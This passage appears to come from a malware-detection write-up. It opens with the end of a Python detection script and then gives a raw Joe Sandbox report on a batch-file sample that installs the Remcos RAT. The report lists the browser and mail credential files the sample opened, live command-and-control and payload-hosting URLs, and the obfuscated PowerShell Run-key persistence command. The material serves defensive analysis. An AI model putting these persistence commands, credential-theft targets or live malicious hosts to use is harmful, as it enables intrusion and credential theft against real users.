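    # benign control: an ordinary quiet install launched from Explorer
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"C:\Windows\explorer.exe",
              r'msiexec.exe /i "C:\Users\user\Downloads\setup.msi" /qn'),
]

if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(basename(ev.image), "->", hits or "clean")
```

The argument-less msiexec.exe rule is the one that fires earliest in this chain (it corresponds to the "Process created / APC Queued / Resumed" row above, before any payload has run); the Run-key and /stext rules confirm the later stages and are cheap to backfill over historical process logs.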
Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager8B\^
Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager8B\:
Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerr|
Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager8B\
Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager5
Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager8B\28
Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager8B\g
Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager">
Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerviderN{
Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp, logs.dat.8.dr | Binary or memory string: [Program Manager]
Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager8B\#
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_228E2933 cpuid
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (6 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (6 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_228E2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_0041739B GetVersionExW

Stealing of Sensitive Information

Source: Yara match | File source: 00000008.00000002.4525154442.000000002253E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4525112746.00000000224FD000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 1276, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: ESMTPPassword 15_2_004033F0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword 15_2_00402DB3
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword 15_2_00402DB3
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 1276, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 6416, type: MEMORYSTR

Remote Access Functionality

Source: C:\Windows\SysWOW64\msiexec.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-TXCR8B
Source: Yara match | File source: 00000008.00000002.4525154442.000000002253E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4525112746.00000000224FD000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 1276, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
MITRE ATT&CK Matrix

Techniques matched by this analysis, grouped by tactic, with the number of matching signatures in parentheses (the unmatched placeholder cells of the matrix are omitted):

Reconnaissance: no techniques matched
Resource Development: Scripting (1)
Initial Access: no techniques matched
Execution: Windows Management Instrumentation (1); Native API (11); Command and Scripting Interpreter (22); PowerShell (1)
Persistence: Scripting (1); DLL Side-Loading (1); Registry Run Keys / Startup Folder (1)
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (412); Registry Run Keys / Startup Folder (1)
Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Masquerading (1); Modify Registry (1); Virtualization/Sandbox Evasion (141); Access Token Manipulation (1); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (11); Credentials in Registry (1)
Discovery: System Time Discovery (1); Account Discovery (1); File and Directory Discovery (3); System Information Discovery (27); Security Software Discovery (141); Virtualization/Sandbox Evasion (141); Process Discovery (4); Application Window Discovery (1); System Owner/User Discovery (1)
Lateral Movement: no techniques matched
Collection: Archive Collected Data (1); Data from Local System (1); Input Capture (11); Clipboard Data (2)
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (2); Application Layer Protocol (213)
Exfiltration: no techniques matched
Impact: no techniques matched
Behavior Graph

The graph is rendered as an image in the original report; the information recoverable from its node labels is listed here.

Behavior Graph ID: 1536035 | Sample: rIMGTR657365756.bat | Start date: 17/10/2024 | Architecture: WINDOWS | Score: 100

Signatures attached to the sample node: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures

Contacted domains and IPs:
• pelele.duckdns.org (185.236.203.101; ports 49848, 49859, 51525; M247GB, Romania) - Uses dynamic DNS services
• plieltd.top (104.21.56.189; ports 443, 49797; CLOUDFLARENETUS, United States)
• geoplugin.net (178.237.33.50; ports 49860, 80; ATOM86-ASATOM86NL, Netherlands)
• miottoezanella.com (194.76.118.27; ports 443, 49704; KELIWEBIT, Italy)

Process tree:
• powershell.exe (started from the sample) - signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; 2 other signatures. Starts msiexec.exe and conhost.exe.
• cmd.exe (started from the sample) - signature: Suspicious powershell command line found. Starts powershell.exe and conhost.exe.
• msiexec.exe (child of powershell.exe) - contacts pelele.duckdns.org, plieltd.top and geoplugin.net; drops C:\ProgramData\remcos\logs.dat (data); signatures: Detected Remcos RAT; Tries to steal Mail credentials (via file registry); Maps a DLL or memory area into another process; 2 other signatures. Starts two further msiexec.exe instances, cmd.exe and 3 other processes.
• powershell.exe (child of cmd.exe) - contacts miottoezanella.com; signature: Found suspicious powershell code related to unpacking or dynamic code loading. Starts conhost.exe.
• msiexec.exe (child of msiexec.exe) - signature: Tries to harvest and steal browser information (history, passwords, etc).
• cmd.exe (child of msiexec.exe) - starts conhost.exe and reg.exe.

Antivirus detection

Source | Detection | Scanner | Label | Link
rIMGTR657365756.bat | 5% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://www.imvu.comr | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
http://www.imvu.com | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe |
http://geoplugin.net/json.gp | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://login.yahoo.com/config/login | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
http://www.ebuddy.com | 0% | URL Reputation | safe |
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
pelele.duckdns.org | 185.236.203.101 | true | true | | unknown
plieltd.top | 104.21.56.189 | true | false | | unknown
geoplugin.net | 178.237.33.50 | true | false | | unknown
miottoezanella.com | 194.76.118.27 | true | false | | unknown
URLs

Name | Malicious | Antivirus Detection | Reputation
pelele.duckdns.org | true | | unknown
https://miottoezanella.com/Hovedvrket.rar | false | | unknown
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
https://plieltd.top/nwnNBPSeuTV8.bin | false | | unknown
IPs

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.56.189 | plieltd.top | United States | 13335 | CLOUDFLARENETUS | false
185.236.203.101 | pelele.duckdns.org | Romania | 9009 | M247GB | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
194.76.118.27 | miottoezanella.com | Italy | 202675 | KELIWEBIT | false
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1536035
Start date and time: 2024-10-17 15:02:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: rIMGTR657365756.bat
Detection: MAL
Classification: mal100.troj.spyw.evad.winBAT@24/13@7/4
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 166
• Number of non-executed functions: 294
Cookbook Comments:
• Found application associated with file extension: .bat
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 5576 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6388 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: rIMGTR657365756.bat
Time | Type | Description
09:03:04 | API Interceptor | 80x Sleep call for process: powershell.exe modified
09:04:10 | API Interceptor | 5217885x Sleep call for process: msiexec.exe modified
15:03:33 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Aversi %Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)
15:03:41 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Aversi %Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.236.203.101 | 17282393454a20ebb72846132bb7146ed4a1a58abc0a2fcca78c88bb5a73356856494e7ece637.dat-decoded.exe | malicious | Remcos |
185.236.203.101 | na.rtf | malicious | Remcos |
185.236.203.101 | DSpWOKW7zn.rtf | malicious | Remcos |
185.236.203.101 | Formularz instrukcji p#U0142atno#U015bci Millennium.xls | malicious | Remcos |
185.236.203.101 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtf | malicious | Remcos |
178.237.33.50 | Priority_Quote_Request_Items_List.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | SKU_0001710-1-2024-SX-3762.bat | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | SWIFT COPY.xls | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Proof_of_Payment 08637.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | New Order.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | PO OCTOBER 2024 _ PDF.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | 17290972859113f7995b23df55ec0b2b7ae16822e0e59b575d2cfb603e79ed2793266980db734.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 1729097285e3762b77689e8a42c1dbcef03f73271c1f3d5846d063e03830c041710b98532d536.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | ge5AHaHgsn.exe | malicious | Remcos | geoplugin.net/json.gp
194.76.118.27 | rSKGCROCOMANDAFABSRLM60_647746748846748347474.bat | malicious | Remcos, GuLoader |
194.76.118.27 | rComandaKOMARONTRADESRL435635Lukketid.bat | malicious | Remcos, GuLoader |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
geoplugin.net | Priority_Quote_Request_Items_List.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | SKU_0001710-1-2024-SX-3762.bat | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | SWIFT COPY.xls | malicious | Remcos | 178.237.33.50
geoplugin.net | Proof_of_Payment 08637.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | New Order.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | PO OCTOBER 2024 _ PDF.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | 17290972859113f7995b23df55ec0b2b7ae16822e0e59b575d2cfb603e79ed2793266980db734.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | 1729097285e3762b77689e8a42c1dbcef03f73271c1f3d5846d063e03830c041710b98532d536.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | ge5AHaHgsn.exe | malicious | Remcos | 178.237.33.50
miottoezanella.com | rComandaKOMARONTRADESRL435635Lukketid.bat | malicious | Remcos, GuLoader | 194.76.118.27
Match | Associated Sample Name / URL | Detection | Threat Name | Context
KELIWEBIT | rSKGCROCOMANDAFABSRLM60_647746748846748347474.bat | malicious | Remcos, GuLoader | 194.76.118.27
KELIWEBIT | rComandaKOMARONTRADESRL435635Lukketid.bat | malicious | Remcos, GuLoader | 194.76.118.27
KELIWEBIT | https://shared.outlook.inky.com/link?domain=ctrk.klclick.com&t=h.eJw9jbFuwjAURX8FeYbYie0EMSE1FImhAwvqhOznR2v5EZD9MqH-O5ih87n3nIeYM4nNQvwy38tGSuCcmkRAEVIDt6skqdqDOX7sD6MelT5-rnfWnrqvfjd-n5VYLkSq_5_osyN2eeXnEicsZQXuHtmRzDfMjLT9n3h4m603QzD6Mliv8ILrvveofQCAQVkTlGyHTreqU8Y22tYS1tLVMW_RcchxSgEdlWqrOLzwNBP9PQFiYELz.MEYCIQD02rB_k_ktgQerK63B9HoYsBFlvy8F_tbykpnP7o7g5AIhAOA712rppvWoWatyTJ3OTcEdq2l5y_Vb1I5ameNhve0o%C3%B8#am9obi5kYXZpc0BhbWF6b24uY29t | malicious | HTMLPhisher | 185.56.218.16
KELIWEBIT | https://www.bonolacenter.com/ | malicious | Phisher | 185.221.173.68
KELIWEBIT | Hilix.mpsl.elf | malicious | Mirai | 185.221.174.5
KELIWEBIT | Hilix.mips.elf | malicious | Mirai | 185.221.174.2
KELIWEBIT | 64CU11Bnfr.elf | malicious | Mirai | 185.221.174.2
KELIWEBIT | https://chipotle.app.link/?$3p=e_et&$fallback_url=https%3A%2F%2Fwww.animagricola.farm%2Fssl%2Fanimagricola%2FTafeqld%2FbWl0Y2hlbGwuY2FyZXdAdGFmZXFsZC5lZHUuYXU= | malicious | HTMLPhisher | 185.221.175.32
KELIWEBIT | https://chipotle.app.link/?$3p=e_et&$fallback_url=https%3A%2F%2Fwww.animagricola.farm%2Fssl%2Fanimagricola%2FTafeqld%2FbmlrLmJhYm92aWNAdGFmZXFsZC5lZHUuYXU= | malicious | HTMLPhisher | 185.221.175.32
KELIWEBIT | Assicurazioni Generali Bank Payment Copy_doc.pdf.exe | malicious | AgentTesla | 185.56.218.14
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 104.21.53.8
CLOUDFLARENETUS | https://dropepweg.pages.dev/?e=nhurn@catsimulators.com | malicious | HTMLPhisher | 172.66.44.117
CLOUDFLARENETUS | taskhostws.exe | malicious | Snake Keylogger | 188.114.97.3
CLOUDFLARENETUS | PO-94858.exe | malicious | Snake Keylogger | 188.114.96.3
CLOUDFLARENETUS | wethinkaboutthegreatsolutionforgreat.hta | malicious | Cobalt Strike, Snake Keylogger | 188.114.97.3
CLOUDFLARENETUS | ACCOUNTXSTATEMENT.xls | malicious | Snake Keylogger | 188.114.96.3
CLOUDFLARENETUS | PO-94858.exe | malicious | Snake Keylogger | 188.114.97.3
CLOUDFLARENETUS | https://iplogger.ru/250925 | malicious | Unknown | 162.159.140.237
CLOUDFLARENETUS | https://iplogger.ru/250925 | malicious | Unknown | 172.66.0.235
CLOUDFLARENETUS | Media24.html | malicious | Unknown | 172.67.181.177
M247GB | arm7.elf | malicious | Unknown | 154.17.76.63
M247GB | armv7l.elf | malicious | Mirai | 38.206.71.34
M247GB | bBcZoComLl.exe | malicious | Phorpiex, Xmrig | 91.202.233.141
M247GB | file.exe | malicious | Phorpiex, Xmrig | 91.202.233.141
M247GB | dgiX55cHyU.exe | malicious | Phorpiex, Xmrig | 91.202.233.141
M247GB | na.elf | malicious | Mirai | 45.86.28.95
M247GB | na.elf | malicious | Mirai | 158.46.140.178
M247GB | rSOD219ISF-____.scr.exe | malicious | Remcos | 104.250.180.178
M247GB | rWWTLCLtoUSADCL.scr.exe | malicious | XWorm | 104.250.180.178
M247GB | rComandaKOMARONTRADESRL435635Lukketid.bat | malicious | Remcos, GuLoader | 185.236.203.100
ATOM86-ASATOM86NL | Priority_Quote_Request_Items_List.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | SKU_0001710-1-2024-SX-3762.bat | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | SWIFT COPY.xls | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | Proof_of_Payment 08637.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | New Order.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | PO OCTOBER 2024 _ PDF.exe | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | 17290972859113f7995b23df55ec0b2b7ae16822e0e59b575d2cfb603e79ed2793266980db734.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 1729097285e3762b77689e8a42c1dbcef03f73271c1f3d5846d063e03830c041710b98532d536.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | ge5AHaHgsn.exe | malicious | Remcos | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | v2.0.pdf | malicious | Unknown | 194.76.118.27
3b5074b1b5d032e5620f69f9f700ff0e | PO-94858.exe | malicious | Snake Keylogger | 194.76.118.27
3b5074b1b5d032e5620f69f9f700ff0e | SKU_0001710-1-2024-SX-3762.bat | malicious | Remcos, GuLoader | 194.76.118.27
3b5074b1b5d032e5620f69f9f700ff0e | PO-94858.exe | malicious | Snake Keylogger | 194.76.118.27
3b5074b1b5d032e5620f69f9f700ff0e | https://iplogger.ru/250925 | malicious | Unknown | 194.76.118.27
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Win32.PWSX-gen.2892.1397.exe | malicious | Snake Keylogger, VIP Keylogger | 194.76.118.27
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Win32.PWSX-gen.5562.5412.exe | malicious | Snake Keylogger, VIP Keylogger | 194.76.118.27
3b5074b1b5d032e5620f69f9f700ff0e | Bestireno Transformados SL PEDIDO 268884.vbs | malicious | GuLoader, Snake Keylogger | 194.76.118.27
3b5074b1b5d032e5620f69f9f700ff0e | Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbs | malicious | GuLoader, Snake Keylogger | 194.76.118.27
3b5074b1b5d032e5620f69f9f700ff0e | Bestireno Transformados SL PEDIDO 268884.vbs | malicious | Unknown | 194.76.118.27
37f463bf4616ecd445d4a1937da06e19 | SKU_0001710-1-2024-SX-3762.bat | malicious | Remcos, GuLoader | 104.21.56.189
37f463bf4616ecd445d4a1937da06e19 | ecforyoutomakemegood.hta | malicious | Cobalt Strike, AgentTesla, GuLoader | 104.21.56.189
37f463bf4616ecd445d4a1937da06e19 | Bestellung.vbs | malicious | GuLoader | 104.21.56.189
37f463bf4616ecd445d4a1937da06e19 | Bestellung_101624.vbs | malicious | GuLoader | 104.21.56.189
37f463bf4616ecd445d4a1937da06e19 | Bestireno Transformados SL PEDIDO 268884.vbs | malicious | GuLoader, Snake Keylogger | 104.21.56.189
37f463bf4616ecd445d4a1937da06e19 | Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbs | malicious | GuLoader, Snake Keylogger | 104.21.56.189
37f463bf4616ecd445d4a1937da06e19 | SKM_C16024100408500.vbs | malicious | GuLoader | 104.21.56.189
37f463bf4616ecd445d4a1937da06e19 | company T.P. Drinovci d.docx | malicious | Unknown | 104.21.56.189
37f463bf4616ecd445d4a1937da06e19 | SKM_C25024100408500.vbs | malicious | GuLoader | 104.21.56.189
37f463bf4616ecd445d4a1937da06e19 | 6rxVO117yJ.exe | malicious | RHADAMANTHYS | 104.21.56.189
                                                                                                    No context
Process: C:\Windows\SysWOW64\msiexec.exe
File Type: data
Category: dropped
Size (bytes): 216
Entropy (8bit): 3.376082901980628
Encrypted: false
SSDEEP: 3:rhlKlM+UlSl/TlFi5JWRal2Jl+7R0DAlBG45klovDl6ALilXIkqoojklovDl6v:6lyIl/T65YcIeeDAlOWAAe5q1gWAv
MD5: C3A8DBD5C901CB3693A1DFAFBF0250B0
SHA1: C571E14F360188725CB2C86347E8970E21DB096E
SHA-256: 097093CCA9190CE6F4BF84D87C8719B51C16D703C2048458E3CB4F3D8AC3127F
SHA-512: CF40D6BA33314A40C209A52FD0D839B3D8F7228A041ADD9B5FD2A00FCA65E6D98E01F9D80ECEC87B3F3532AE07387FA97B56DEF6B5F5499446C53AA4473BC8A6
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Preview: ....[.2.0.2.4./.1.0./.1.7. .0.9.:.0.3.:.3.7. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):957
                                                                                                    Entropy (8bit):5.0066301715842645
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:qXdVauKyGX85jHf3SvXhNlT3/7YvfbYro:6ba0GX85mvhjTkvfEro
                                                                                                    MD5:09BC68DFB56F7449631EBD54736170C5
